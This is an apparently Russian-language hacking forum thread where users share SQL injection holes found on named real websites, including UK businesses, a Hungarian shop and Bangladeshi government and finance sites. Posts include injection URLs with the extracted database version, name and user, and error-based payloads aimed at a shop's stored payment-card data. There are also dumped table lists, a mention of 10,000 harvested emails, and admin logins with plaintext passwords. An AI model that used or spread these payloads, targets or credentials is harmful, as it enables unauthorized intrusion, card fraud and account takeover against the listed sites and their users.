Выкладываем SQL иньекции.

[Farhod]

Выкладываем в этой теме найденые SQL иньекции.

Раскручиваем скулю до версии мускуля бд и юзера. Можно сразу на вывод определенной инфы.

Пример:
http://www.anonym.to/?http://www.interp ... t(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Version:5.0.77
Database:interplay
user:interplay@localhost

Иньекции такого вида не нужны будут удаляться.

http://site.com/news.php?id=4'
........................................................................................................................................

http://bpsca.co.uk/products.php?id=132- ... t(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12--

Version:5.1.56-community-log
Database:web231-website-1
User:[email protected]

........................................................................................................................................

http://newportrestaurantgroup.com/press ... t(version(),0x3a,database(),0x3a,user()),5,6,7--

Version:5.0.51a
Database:newporth_NHCSync
User:[email protected]

........................................................................................................................................

http://newagestudios.co.uk/serviceinfo. ... t(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

Version:5.0.45-community-nt
Database:newagestudios
User:newagestudios@localhost

........................................................................................................................................

http://naturalpaving.co.uk/page.php?id= ... ,(version(),0x3a,database(),0x3a,user()),4,5,6,7,8--

Version:5.0.77-log
Database:naturalpdb
User:[email protected]

Ковыряйте глядиш че нужного вам найдете

 

[Dicobraz]

шоп - goodshop.cc
уязвимый параметр - логин
пример

PHP код:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT concat_ws(0x3a,card_fullinfo) FROM `cards` LIMIT 1,1), 1, 1000), FLOOR(RAND(0)*2))) --
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT concat_ws(0x3a,card_fullinfo) FROM `cards` LIMIT 2,1), 1, 1000), FLOOR(RAND(0)*2))) --

 

[Vega]

шопчик)
http://sexsense.hu/shop.php?kat=8
с дыркой

xttp://www.caredirect.eu/custom/shop/sh ... 2F&value=4

 

[DllMain]

Это просто ошибка мускула об коннекте к дб, а не скуля.

 

[TwoK]

Структура таблиц БД, имеются юзеры и 10к мыл

Код:
cities
states
tblBannerAdClicks
tblBannerAds
tblBusiness
tblBusinessDef
tblBusinessType
tblDjs
tblEmailRequests
tblEvents
tblMail2
tblMailAddresses
tblPhone
tblPhoneCarrier
tblPromoters
tblSiteDef
tblVenues
tblVideos
tblVip
tblYesNo
tbl_links
tbl_linkscat
tbl_members
tbl_regtype
tbl_tetris
visitors
visitors_2005
visitors_2006
visitors_2007


Cтруктура таблиц в БД

Код:
banners
banners_banner_id_seq
careers
careers_career_id_seq
downloads
franchises
franchises_franchise_id_seq
news
news_news_id_seq
screenshots
screenshots_screenshot_id_seq
titles
titles_title_id_seq

 

[LaresGAM]

Немного Бангладеша


_http://www.digitalbangladesh.gov.bd/content.php?CID=3&BlogCategory=24SQL

DB: reflbd_db

Админы:
Логин: kamalrahim
Пароль: letmein_1234
Мыло:[email protected]

Логин: admin
Пароль: blacky
Мыло: [email protected]

Цитата: admin
blogcategory
blogresponse
category
contents
events
highlights
mail
newsletter
newsletter1
newsletter2
newslettercontent
poller
poller_option
poller_vote
services
specials
wp_bldb_commentmeta
wp_bldb_comments
wp_bldb_links
wp_bldb_options
wp_bldb_postmeta
wp_bldb_posts
wp_bldb_term_relationships
wp_bldb_term_taxonomy
wp_bldb_terms
wp_bldb_usermeta
wp_bldb_users


Reliance Finance Limited

_http://www.reflbd.com/section.php?menu_id=m509151887SQL

DB: eservice_digitalbd
Цитата: admin
user_info
submenu
news
menu
logo
links
home_page
home_image
files
diss_topic
diss_comment
career
banner